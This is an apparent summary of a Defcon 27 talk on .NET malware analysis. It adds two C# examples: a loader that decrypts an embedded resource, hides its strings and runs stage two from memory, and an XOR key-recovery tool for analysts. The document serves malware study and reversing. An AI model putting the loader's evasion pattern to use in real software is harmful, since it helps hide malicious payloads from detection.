.NET Malware Threats: Internals And Reversing

Conference:  Defcon 27



The presentation discusses the techniques .NET malware uses to evade detection and infect systems.
  • .NET malware often hides malicious code in embedded resources and encrypts or obfuscates it to evade detection
  • .NET malware can download external assemblies and use hooking to compromise systems
  • Compiling and signing .NET assemblies is easy, and a signed assembly can be used to infect systems
  • The presentation provides examples of .NET malware code and demonstrates how to analyze it
The presenter shows how .NET malware can hook keyboard operations to build a keylogger and how to decrypt the strings embedded in the malware. They also demonstrate how to compile and sign a .NET assembly and use it to infect a system.
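The loader pattern the summary describes (a payload hidden in an embedded resource, decrypted at run time and loaded straight from memory, with string decryption applied to the type and method names it needs), as an added example in C#; it is not code from the talk. The resource name payload.bin, the key k3y! and the stage-two type Stage2.Entry with its static method Run are assumptions made for the example.

```csharp
using System;
using System.IO;
using System.Reflection;
using System.Text;

// Added example (not the talk's code): the resource-loader pattern used by many .NET droppers.
// Assumptions: the encrypted stage two is a manifest resource named "payload.bin",
// the key "k3y!" is hardcoded, and stage two exposes a public static Stage2.Entry.Run().
static class ResourceLoader
{
    static readonly byte[] Key = Encoding.ASCII.GetBytes("k3y!");

    // Repeating-key XOR: symmetric, cheap, and enough to keep the payload's bytes out of static signatures.
    public static byte[] Xor(byte[] data, byte[] key)
    {
        var output = new byte[data.Length];
        for (int i = 0; i < data.Length; i++)
            output[i] = (byte)(data[i] ^ key[i % key.Length]);
        return output;
    }

    // Names are stored XOR-encrypted so "Stage2.Entry" and "Run" never appear in the
    // #Strings or #US heaps; they are decoded only at the moment they are needed.
    public static string DecryptString(byte[] cipher) => Encoding.ASCII.GetString(Xor(cipher, Key));

    // "Stage2.Entry" and "Run" XORed with "k3y!" (precomputed for the example).
    static readonly byte[] EncTypeName = { 0x38, 0x47, 0x18, 0x46, 0x0E, 0x01, 0x57, 0x64, 0x05, 0x47, 0x0B, 0x58 };
    static readonly byte[] EncMethodName = { 0x39, 0x46, 0x17 };

    static byte[] ReadResource(string name)
    {
        using (Stream s = Assembly.GetExecutingAssembly().GetManifestResourceStream(name))
        {
            if (s == null) throw new FileNotFoundException("resource not found: " + name);
            using (var ms = new MemoryStream())
            {
                s.CopyTo(ms);
                return ms.ToArray();
            }
        }
    }

    static void Main()
    {
        byte[] image = Xor(ReadResource("payload.bin"), Key);

        // Do not hand garbage to the CLR: a managed image still begins with the DOS "MZ" signature.
        if (image.Length < 0x40 || image[0] != (byte)'M' || image[1] != (byte)'Z')
            return;

        // Assembly.Load(byte[]) maps the image straight from memory; nothing is written to disk,
        // which is why the decrypted stage two is normally recovered by dumping it from memory.
        Assembly stage2 = Assembly.Load(image);
        Type entry = stage2.GetType(DecryptString(EncTypeName), throwOnError: true);
        MethodInfo run = entry.GetMethod(DecryptString(EncMethodName), BindingFlags.Public | BindingFlags.Static);
        run.Invoke(null, null);
    }
}
```

Build it with csc and embed the encrypted stage two with /resource:payload.bin. In dnSpy the resource shows up as opaque bytes and neither Stage2.Entry nor Run is present in the string heaps, so an analyst either reimplements Xor and DecryptString from the MSIL or breaks on Assembly.Load (for example with SOS's !bpmd under WinDbg) and dumps the already-decrypted image from memory.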


.NET malware is well known to security analysts, but even though many tools such as dnSpy, .NET Reflector, de4dot and so on exist to make the analysis easier, most professionals have used them as black-box tools, without concerning themselves with .NET internals, structures, MSIL coding and details. In critical cases it is necessary to have enough knowledge of the internal mechanisms to debug these .NET threats using WinDbg. Unfortunately, .NET malware samples have become very challenging because deobfuscating the associated resources, as well as unpacking them and dumping them from memory, is so complicated. Furthermore, most GUI debugging tools do not offer an inside view of mechanisms such as the CLR Loader, the Managed Heap, synchronization issues and Garbage Collection. On the other side, .NET malware threats are incredibly interesting when analyzed from the MSIL instruction code, which allows one to see code injections using MSIL, and attempts to compromise the .NET Runtime keep being a real concern. The purpose of this presentation is to help professionals understand .NET malware threats and techniques by explaining concepts about .NET internals and mechanisms, along with a few reversing techniques.
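As an added example of the analysis side the abstract argues for (working from the bytes rather than treating the decompiler as a black box), here is a C# program that recovers a repeating-key XOR key from an encrypted resource by known plaintext: an image produced by the Microsoft toolchain, managed assemblies included, carries the MZ signature, e_lfanew and the standard DOS stub at fixed offsets, which pins down the key without ever reading the loader's decryption routine. It is not code from the talk; the resource is constructed in place with the assumed key k3y!, and with a real sample you would pass in the bytes saved from the resource viewer instead.

```csharp
using System;
using System.IO;
using System.Linq;
using System.Text;

// Added example (not from the talk): known-plaintext recovery of a repeating-key XOR key
// from an encrypted .NET resource. The sample resource below is constructed, not a real sample.
static class XorKeyRecovery
{
    // DOS stub the Microsoft linker writes at offset 0x40 (csc and ilasm output included).
    static readonly byte[] DosStub =
        new byte[] { 0x0E, 0x1F, 0xBA, 0x0E, 0x00, 0xB4, 0x09, 0xCD, 0x21, 0xB8, 0x01, 0x4C, 0xCD, 0x21 }
        .Concat(Encoding.ASCII.GetBytes("This program cannot be run in DOS mode.\r\r\n$")).ToArray();

    public static byte[] Xor(byte[] data, byte[] key)
    {
        var output = new byte[data.Length];
        for (int i = 0; i < data.Length; i++)
            output[i] = (byte)(data[i] ^ key[i % key.Length]);
        return output;
    }

    // Returns the shortest key (up to maxKeyLen bytes) that turns the blob into something PE-shaped, or null.
    public static byte[] RecoverKey(byte[] cipher, int maxKeyLen = 32)
    {
        const int StubOffset = 0x40;
        if (cipher.Length < StubOffset + DosStub.Length) return null;

        for (int keyLen = 1; keyLen <= Math.Min(maxKeyLen, DosStub.Length); keyLen++)
        {
            // Known plaintext at a known offset gives the first keyLen key bytes directly.
            var key = new byte[keyLen];
            for (int i = 0; i < keyLen; i++)
                key[i] = (byte)(cipher[StubOffset + i] ^ DosStub[i]);

            byte[] plain = Xor(cipher, key);

            // Check 1: DOS signature.
            if (plain[0] != (byte)'M' || plain[1] != (byte)'Z') continue;

            // Check 2: the remainder of the stub must decrypt cleanly too, which rejects
            // key lengths that only happen to agree on the first few bytes.
            bool stubOk = true;
            for (int i = keyLen; i < DosStub.Length && stubOk; i++)
                stubOk = plain[StubOffset + i] == DosStub[i];
            if (!stubOk) continue;

            // Check 3: e_lfanew must point at a "PE\0\0" signature inside the blob.
            uint eLfanew = BitConverter.ToUInt32(plain, 0x3C);
            if (eLfanew > (uint)plain.Length - 4) continue;
            int pe = (int)eLfanew;
            if (plain[pe] != (byte)'P' || plain[pe + 1] != (byte)'E' || plain[pe + 2] != 0 || plain[pe + 3] != 0) continue;

            return key;
        }
        return null;
    }

    // Constructed sample: a 0x200-byte PE-shaped blob encrypted with "k3y!". Only the headers
    // the checks rely on are filled in; a real resource would be the whole stage-two assembly.
    public static byte[] BuildSampleResource()
    {
        var plain = new byte[0x200];
        plain[0] = (byte)'M'; plain[1] = (byte)'Z';
        BitConverter.GetBytes(0x80u).CopyTo(plain, 0x3C);            // e_lfanew
        DosStub.CopyTo(plain, 0x40);
        Encoding.ASCII.GetBytes("PE\0\0").CopyTo(plain, 0x80);       // NT header signature
        return Xor(plain, Encoding.ASCII.GetBytes("k3y!"));
    }

    static void Main()
    {
        byte[] cipher = BuildSampleResource();
        byte[] key = RecoverKey(cipher);
        Console.WriteLine(key == null ? "no key found" : "key: " + Encoding.ASCII.GetString(key));
        if (key != null)
        {
            // With a real resource this is the decrypted stage two, ready for dnSpy, ildasm or de4dot.
            File.WriteAllBytes("stage2.dumped.dll", Xor(cipher, key));
        }
    }
}
```

The shorter key lengths are rejected by the stub or e_lfanew checks, not by luck: a wrong length mixes key bytes across positions, so the zero bytes around e_lfanew decrypt to non-zero and the resulting offset lands outside the blob. The same approach works for any position-independent stream cipher applied to a PE; only the known-plaintext table changes.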